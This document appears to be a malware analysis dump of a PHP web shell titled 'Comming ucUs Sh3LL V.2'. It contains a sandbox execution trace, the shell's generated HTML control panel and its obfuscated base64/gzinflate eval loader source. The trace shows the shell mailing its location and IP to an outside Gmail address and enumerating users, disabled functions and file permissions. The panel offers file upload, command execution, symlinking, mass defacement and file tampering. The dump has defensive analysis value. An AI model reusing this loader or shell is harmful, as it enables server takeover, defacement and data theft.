4 16 0 0.002575 547640 ini_set 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 5 2 'memory_limit' '64M'
4 16 1 0.002590 547744
4 16 R '128M'
4 17 0 0.002603 547640 header 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 6 1 'Content-Type: text/html; charset=UTF-8'
4 17 1 0.002620 547816
4 17 R NULL
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 7 $tujuanmail = 'mecus.mecus.mecus@gmail.com'
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 8 $x_path = 'http://localhost/uploads/x.php'
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 9 $pesan_alert = 'fix http://localhost/uploads/x.php :p *IP Address : [ 127.0.0.1 ]'
4 18 0 0.002684 547976 mail 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 10 4 'mecus.mecus.mecus@gmail.com' 'LOGGER' 'fix http://localhost/uploads/x.php :p *IP Address : [ 127.0.0.1 ]' '[ 127.0.0.1 ]'
4 18 1 0.003377 548120
4 18 R FALSE
4 19 0 0.003400 547936 error_reporting 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 13 1 0
4 19 1 0.003416 547976
4 19 R 22527
4 20 0 0.003429 547936 set_time_limit 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 14 1 0
4 20 1 0.003445 547968
4 20 R FALSE
4 21 0 0.003458 547936 get_magic_quotes_gpc 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 16 0
4 21 1 0.003472 547936
4 21 R FALSE
4 22 0 0.003487 547936 getcwd 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 73 0
4 22 1 0.003501 547984
4 22 R '/var/www/html/uploads'
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 73 $path = '/var/www/html/uploads'
4 23 0 0.003529 547984 str_replace 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 75 3 '\\' '/' '/var/www/html/uploads'
4 23 1 0.003546 548080
4 23 R '/var/www/html/uploads'
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 75 $path = '/var/www/html/uploads'
4 24 0 0.003572 547984 explode 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 76 2 '/' '/var/www/html/uploads'
4 24 1 0.003587 548560
4 24 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 76 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 78 $id = 0
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 80 $a = TRUE
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 78 $id = 1
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i = 0
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 78 $id = 2
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i = 0
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 78 $id = 3
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i = 0
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 78 $id = 4
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i = 0
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 86 $i++
4 25 0 0.003845 548488 getcwd 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 104 0
4 25 1 0.003859 548536
4 25 R '/var/www/html/uploads'
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 104 $dir = '/var/www/html/uploads'
4 26 0 0.003885 548536 gethostbyname 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 106 1 'localhost'
4 26 1 0.003924 548616
4 26 R '127.0.0.1'
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 106 $ip = '127.0.0.1'
4 27 0 0.003952 548576 php_uname 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 107 0
4 27 1 0.003967 548688
4 27 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 107 $kernel = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4 28 0 0.004002 548688 ini_get 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 108 1 'disable_functions'
4 28 1 0.004017 549168
4 28 R 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 108 $ds = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 109 $show_ds = '<font color=red>pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,</font>'
4 29 0 0.004085 549584 function_exists 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 110 1 'posix_getegid'
4 29 1 0.004099 549624
4 29 R TRUE
4 30 0 0.004113 549584 posix_geteuid 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 116 0
4 30 1 0.004127 549584
4 30 R 33
4 31 0 0.004139 549584 posix_getpwuid 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 116 1 33
4 31 1 0.004167 550416
4 31 R ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 116 $uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
4 32 0 0.004210 550384 posix_getegid 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 117 0
4 32 1 0.004223 550384
4 32 R 33
4 33 0 0.004235 550384 posix_getgrgid 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 117 1 33
4 33 1 0.004262 551048
4 33 R ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 117 $gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 118 $user = 'www-data'
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 119 $uid = 33
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 120 $group = 'www-data'
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 121 $gid = 33
4 34 0 0.004352 549664 scandir 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 450 1 '/var/www/html/uploads'
4 34 1 0.004385 550280
4 34 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'x.php']
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 450 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'x.php']
4 35 0 0.004427 550248 is_dir 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 460 1 '/var/www/html/uploads/.'
4 35 1 0.004444 550312
4 35 R TRUE
4 36 0 0.004458 550280 is_dir 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 460 1 '/var/www/html/uploads/..'
4 36 1 0.004474 550328
4 36 R TRUE
4 37 0 0.004487 550288 is_dir 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 460 1 '/var/www/html/uploads/.htaccess'
4 37 1 0.004503 550328
4 37 R FALSE
4 38 0 0.004517 550288 is_dir 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 460 1 '/var/www/html/uploads/data'
4 38 1 0.004531 550328
4 38 R TRUE
4 39 0 0.004545 550288 is_writable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 465 1 '/var/www/html/uploads/data'
4 39 1 0.004562 550328
4 39 R TRUE
4 40 0 0.004576 550288 perms 1 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 467 1 '/var/www/html/uploads/data'
5 41 0 0.004590 550288 fileperms 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 527 1 '/var/www/html/uploads/data'
5 41 1 0.004604 550328
5 41 R 16895
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 527 $perms = 16895
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 543 $info = 'd'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 556 $info .= 'r'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 557 $info .= 'w'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 560 $info .= 'x'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 563 $info .= 'r'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 564 $info .= 'w'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 567 $info .= 'x'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 570 $info .= 'r'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 571 $info .= 'w'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 574 $info .= 'x'
4 40 1 0.004734 550328
4 40 R 'drwxrwxrwx'
4 42 0 0.004749 550288 is_writable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 468 1 '/var/www/html/uploads/data'
4 42 1 0.004765 550328
4 42 R TRUE
4 43 0 0.004779 550296 is_dir 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 460 1 '/var/www/html/uploads/prepend.php'
4 43 1 0.004796 550344
4 43 R FALSE
4 44 0 0.004809 550296 is_dir 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 460 1 '/var/www/html/uploads/x.php'
4 44 1 0.004825 550328
4 44 R FALSE
4 45 0 0.004838 550280 is_file 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 487 1 '/var/www/html/uploads/.'
4 45 1 0.004853 550312
4 45 R FALSE
4 46 0 0.004865 550280 is_file 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 487 1 '/var/www/html/uploads/..'
4 46 1 0.004880 550328
4 46 R FALSE
4 47 0 0.004893 550288 is_file 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 487 1 '/var/www/html/uploads/.htaccess'
4 47 1 0.004908 550328
4 47 R TRUE
4 48 0 0.004921 550288 filesize 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 488 1 '/var/www/html/uploads/.htaccess'
4 48 1 0.004935 550328
4 48 R 64
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 488 $size = 0.0625
4 49 0 0.004960 550232 round 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 489 2 0.0625 3
4 49 1 0.004975 550304
4 49 R 0.063
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 489 $size = 0.063
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 493 $size = '0.063 KB'
4 50 0 0.005013 550328 is_writable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 500 1 '/var/www/html/uploads/.htaccess'
4 50 1 0.005030 550368
4 50 R FALSE
4 51 0 0.005043 550328 is_readable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 501 1 '/var/www/html/uploads/.htaccess'
4 51 1 0.005059 550368
4 51 R TRUE
4 52 0 0.005072 550328 perms 1 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 502 1 '/var/www/html/uploads/.htaccess'
5 53 0 0.005085 550328 fileperms 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 527 1 '/var/www/html/uploads/.htaccess'
5 53 1 0.005099 550368
5 53 R 33188
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 527 $perms = 33188
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 537 $info = '-'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 556 $info .= 'r'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 557 $info .= 'w'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 560 $info .= '-'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 563 $info .= 'r'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 564 $info .= '-'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 567 $info .= '-'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 570 $info .= 'r'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 571 $info .= '-'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 574 $info .= '-'
4 52 1 0.005230 550368
4 52 R '-rw-r--r--'
4 54 0 0.005245 550328 is_writable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 503 1 '/var/www/html/uploads/.htaccess'
4 54 1 0.005261 550368
4 54 R FALSE
4 55 0 0.005274 550328 is_readable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 503 1 '/var/www/html/uploads/.htaccess'
4 55 1 0.005290 550368
4 55 R TRUE
4 56 0 0.005310 550296 is_file 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 487 1 '/var/www/html/uploads/data'
4 56 1 0.005326 550336
4 56 R FALSE
4 57 0 0.005339 550304 is_file 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 487 1 '/var/www/html/uploads/prepend.php'
4 57 1 0.005355 550352
4 57 R TRUE
4 58 0 0.005368 550312 filesize 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 488 1 '/var/www/html/uploads/prepend.php'
4 58 1 0.005382 550352
4 58 R 57
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 488 $size = 0.0556640625
4 59 0 0.005406 550208 round 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 489 2 0.0556640625 3
4 59 1 0.005420 550280
4 59 R 0.056
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 489 $size = 0.056
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 493 $size = '0.056 KB'
4 60 0 0.005457 550312 is_writable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 500 1 '/var/www/html/uploads/prepend.php'
4 60 1 0.005474 550352
4 60 R FALSE
4 61 0 0.005487 550312 is_readable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 501 1 '/var/www/html/uploads/prepend.php'
4 61 1 0.005503 550352
4 61 R TRUE
4 62 0 0.005516 550312 perms 1 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 502 1 '/var/www/html/uploads/prepend.php'
5 63 0 0.005530 550312 fileperms 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 527 1 '/var/www/html/uploads/prepend.php'
5 63 1 0.005544 550352
5 63 R 33261
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 527 $perms = 33261
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 537 $info = '-'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 556 $info .= 'r'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 557 $info .= 'w'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 560 $info .= 'x'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 563 $info .= 'r'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 564 $info .= '-'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 567 $info .= 'x'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 570 $info .= 'r'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 571 $info .= '-'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 574 $info .= 'x'
4 62 1 0.005672 550352
4 62 R '-rwxr-xr-x'
4 64 0 0.005686 550312 is_writable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 503 1 '/var/www/html/uploads/prepend.php'
4 64 1 0.005702 550352
4 64 R FALSE
4 65 0 0.005715 550312 is_readable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 503 1 '/var/www/html/uploads/prepend.php'
4 65 1 0.005731 550352
4 65 R TRUE
4 66 0 0.005745 550304 is_file 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 487 1 '/var/www/html/uploads/x.php'
4 66 1 0.005764 550336
4 66 R TRUE
4 67 0 0.005777 550296 filesize 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 488 1 '/var/www/html/uploads/x.php'
4 67 1 0.005790 550336
4 67 R 9429
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 488 $size = 9.2080078125
4 68 0 0.005833 550200 round 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 489 2 9.2080078125 3
4 68 1 0.005847 550272
4 68 R 9.208
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 489 $size = 9.208
3 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 493 $size = '9.208 KB'
4 69 0 0.005887 550296 is_writable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 500 1 '/var/www/html/uploads/x.php'
4 69 1 0.005904 550336
4 69 R FALSE
4 70 0 0.005917 550296 is_readable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 501 1 '/var/www/html/uploads/x.php'
4 70 1 0.005933 550336
4 70 R TRUE
4 71 0 0.005945 550296 perms 1 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 502 1 '/var/www/html/uploads/x.php'
5 72 0 0.005959 550296 fileperms 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 527 1 '/var/www/html/uploads/x.php'
5 72 1 0.005971 550336
5 72 R 33204
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 527 $perms = 33204
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 537 $info = '-'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 556 $info .= 'r'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 557 $info .= 'w'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 560 $info .= '-'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 563 $info .= 'r'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 564 $info .= 'w'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 567 $info .= '-'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 570 $info .= 'r'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 571 $info .= '-'
4 A /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 574 $info .= '-'
4 71 1 0.006099 550336
4 71 R '-rw-rw-r--'
4 73 0 0.006113 550296 is_writable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 503 1 '/var/www/html/uploads/x.php'
4 73 1 0.006129 550336
4 73 R FALSE
4 74 0 0.006142 550296 is_readable 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 503 1 '/var/www/html/uploads/x.php'
4 74 1 0.006156 550336
4 74 R TRUE
3 12 1 0.006173 550240
2 7 1 0.006192 459208
0.006229 378120
TRACE END [2023-02-12 22:07:22.176146]
Generated HTML code
<html><head>
<link href="https://fonts.googleapis.com/css?family=Supermercado+One&display=swap" rel="stylesheet">
<title>Comming ucUs Sh3LL V.2</title>
<style>
body{
font-family:Supermercado One, sans-serif;
background-color: #000022;
background-image: url();
background-size: center; background-repeat:no-repeat; background-attachment: fixed; background-size: cover; background-position:center;
color: white;
}
#content tr:hover{
background-color: black;
text-shadow:0px 0px 10px black;
}
#content .first{
background-color: white;
}
table{
border: 1px #000000 dotted;
}
a{
color: #00FF66;
text-decoration: none;
}
a:hover{
color:blue;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
.lazy {
margin: 0;
font-family:Supermercado One;
}
</style>
</head>
<body>
<h1><center><img src="https://c.top4top.net/p_11004tbku0.gif" height="350 width=" 350"=""><font color="white" face=""></font><div class="lazy"><font color="white" face="">Comming ucUs SH3LL V.2</font></div></center></h1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr><td><font color="white">Path :</font> <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</td></tr><tr><td>Disable Functions : <font color="red">pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,</font><br>System : <font color="#00FF66">Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</font><br><center><hr>[ <a href="?">Home</a> ][ <a href="?dir=/var/www/html&to=zoneh">Zone-h</a> ][ <a href="?dir=/var/www/html&to=jumping">Jumping</a> ][ <a href="?dir=/var/www/html&to=sym">Symlink</a> ][ <a href="?dir=/var/www/html&to=mass">Mass Depes</a> ][ <a href="?dir=/var/www/html&to=cmd">Command</a> ]</center><hr><form enctype="multipart/form-data" method="POST">
<font color="white">File Upload :</font> <input type="file" name="file">
<input type="submit" value="Crotz">
</form>
</td></tr></tbody></table><br><center></center><div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permission</center></td>
<td><center>Modify</center></td>
</tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr>
<td><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value="">Pilih</option>
<option value="delete">Hapus</option>
<option value="chmod">Chmod</option>
<option value="rename">Ganti Nama</option>
<option value="edit">Ubah</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value=">">
</form></center></td>
</tr><tr>
<td><a href="?filesrc=/var/www/html/x.php&path=/var/www/html">x.php</a></td>
<td><center>9.208 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value="">Pilih</option>
<option value="delete">Hapus</option>
<option value="chmod">Chmod</option>
<option value="rename">Ganti Nama</option>
<option value="edit">Ubah</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="x.php">
<input type="hidden" name="path" value="/var/www/html/x.php">
<input type="submit" value=">">
</form></center></td>
</tr></tbody></table>
</div><center><br>Copyright © 2019 | Powered By MecUs7</center>
</body></html>Original PHP code
<?php
/*
Code Successfully Obfuscated By tools.sadcode.org Obfuscator :-)
Thanks For Using :D
*/
$ObFus_Sad = "ZXZhbCgnPz4nLmd6dW5jb21wcmVzcyhnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJFNhZF9UbzBMcykpKSkpOw";
$Sad_To0Ls = "PA1ibNw/BQ5+bFV3ggwXcjj9WzJP4o88juMmOCTPRc82YjPOzjHm0/qSlaou4gu4HhxbSgDwqzHH95Lij3O7j5NOl/h4oMuR7DVn6l2wfwFFgLLWQs5L3myptfZ99bEBUbQ81RxUlbEHP+CyCErrLYBsJY/9Uw3x2RfkAOvWerB4BJ5fzgzAQHrunYd1LqohmrSAEWMTGEqUFqWAiS9NFl6xJyzAtGAChCmsyRlAEjabJOljRC1C4+bJAkoSbIBljPoSBEu1gLCNV5GND4CN34CNjPfjAwaFMFNwqBlCUGatp4UPJBEPkDKqioSoBSLrJZAyQ2dkm8t0dhMDbGTx+bwhQH7ngj+EImGoxBsol4+A7WyPein5fB4DUyVhIUh5+Hp9Qk1g3lbCeLI8XxVyXyb+aATh53gL87t4f/NI9Z7p+ojg/JQvfghg+Qz14/wg58yCrg5ZwQ/4aRfD+SAvwEst3GThvyv07QBd/HCqEbxPMu2IMo1/QCk9Fu0SO6jymOtY7lfD0cvTP8Nyqqo6duxf0j/mfb30Cfdvf6nGEBenxfaH2kyfuelJH+c9aDnQMhE5+ww57iwwwLYHxy0uPK+1luSrDj+I8d5DacqBejqHZMkFzFqM+Af2lYcAkusCKUH3Z1NyES3jJDBBL9BK5C79vsIa7ybCB/zFtAOJz0WlP8PgHeyjuPYnecxqSLvVGieo7cF4tsvjjOoUsNMI8X/+Mb/JK9B01AM1bqq5dmcn6TAjU5/ZjvlP+y9oPCxdIXTnXaJOrj/cW38zc0n81VoB5D9Yv/5RNIdC0kMjp3b0I5XHTIQCXS/0i5Qrwivv09ASztIIAFMTOAFgkz7dSg6YUf8S9dbWbssvtvdwmAuJKb/4Qg0Ghrs19be3DVdSwC9et777z1GosyAR+xeb/9zOjufRbjsrLZnvEa3mk5m3zjb8l7oubDO5tZv80T+m7l+FXhIGtQC2Wst3xb7u68UdSp39vIALrUNH1BnyIpWvJ0LqTGXC9GPNNh4OIxuY/yeW8aIRN5BF/YWiOlvJ9lj7yPWHv7Vt//bmwI0Na